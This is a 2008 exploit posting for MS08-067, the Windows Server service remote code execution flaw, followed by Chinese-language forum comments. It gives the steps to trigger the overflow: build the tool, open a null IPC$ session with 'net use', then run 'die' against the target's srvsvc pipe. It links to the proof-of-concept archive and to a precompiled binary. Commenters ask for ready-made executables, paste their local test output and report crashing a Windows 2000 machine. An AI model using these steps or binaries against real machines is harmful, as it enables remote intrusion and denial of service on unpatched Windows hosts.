MS Windows Server Service Code Execution PoC (MS08-067)
In vstudio command prompt:
mk.bat
next:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/…)
net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc
In some cases, /user:”” “”, will suffice (i.e., anonymous connection)
You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
nothing.
This is because it depends on the state of the stack prior to the “overflow”.
You need a slash on the stack prior to the input buffer.
So play around a bit, you’ll get it working reliably…
poc:
http://milw0rm.com/sploits/2008-ms08-067.zip
# milw0rm.com [2008-10-23]
编译好的:http://www.butian.org/security/software/attack/405.html
有谁编译了?
看起来挺可怕的。
WAHAHAH 1722 000006ba
hi
这是啥意思啊?
传说中的只要知道IP就可以搞你的漏洞
鬼仔咋不编译个EXE出来,
俺白来了。
鬼仔老实复制别人东西,
没有资源的地方不会长久的。
刚开始以为可以用VC编译,结果要用VS,至少3G,太大了,懒得下载,谁有VS的,可以编译下发个exe我。
@lenemon: 真的太大了。这东西有这么牛比?那网吧或者那些懒虫们不就。。。
ncacn_np:\\\\127.0.0.1[\\pipe\\srvsvc]
WAHAHAH 1727 000006bf
hi
ncacn_np:\\\\127.0.0.1[\\pipe\\srvsvc]
WAHAHAH 1727 000006bf
hi
怎么搞的,没下文的?
哦~~~我明白了、原来真的这样恐怖
D:\My Documents\桌面\ms08-067>die \\127.0.0.1 \pipe\srvsvc
ncacn_np:\\\\127.0.0.1[\\pipe\\srvsvc]
WAHAHAH 1727 000006bf
hi
D:\My Documents\桌面\ms08-067>net use \\127.0.0.1\IPC$ /user:”” “”
命令成功完成。
楼上兄弟,拜托,是先建立空连接,然后在用DIE溢出,你反着来?说明了什么?
D:\My Documents\桌面\ms08-067>net use \\127.0.0.1\IPC$ /user:”” “”
命令成功完成。
能建立远程连接又怎么样?IPC$入侵?呵呵!
nightmoon 你搞错没有。。。你连的是本机啊,本机本来不密码就可以成功用ipc连接。
有没谁成功了的?
需要在源代码中加入攻击代码,然后对方的server服务开启?
有没有更详细点的资料呢?
成功测试!
需要接触RPC界面!
要更改代码了。
http://www.butian.org/security/software/attack/405.html
.abu.点评:
已经编译好MS08-067的POC代码die.exe,大家可以搭环境测试一下。
最新测试结果:飞鸟帮助测试2000环境,攻击后直接出现60秒关机。
貌似这东西不好搞啊
能让你建立空连接的主机不多见吧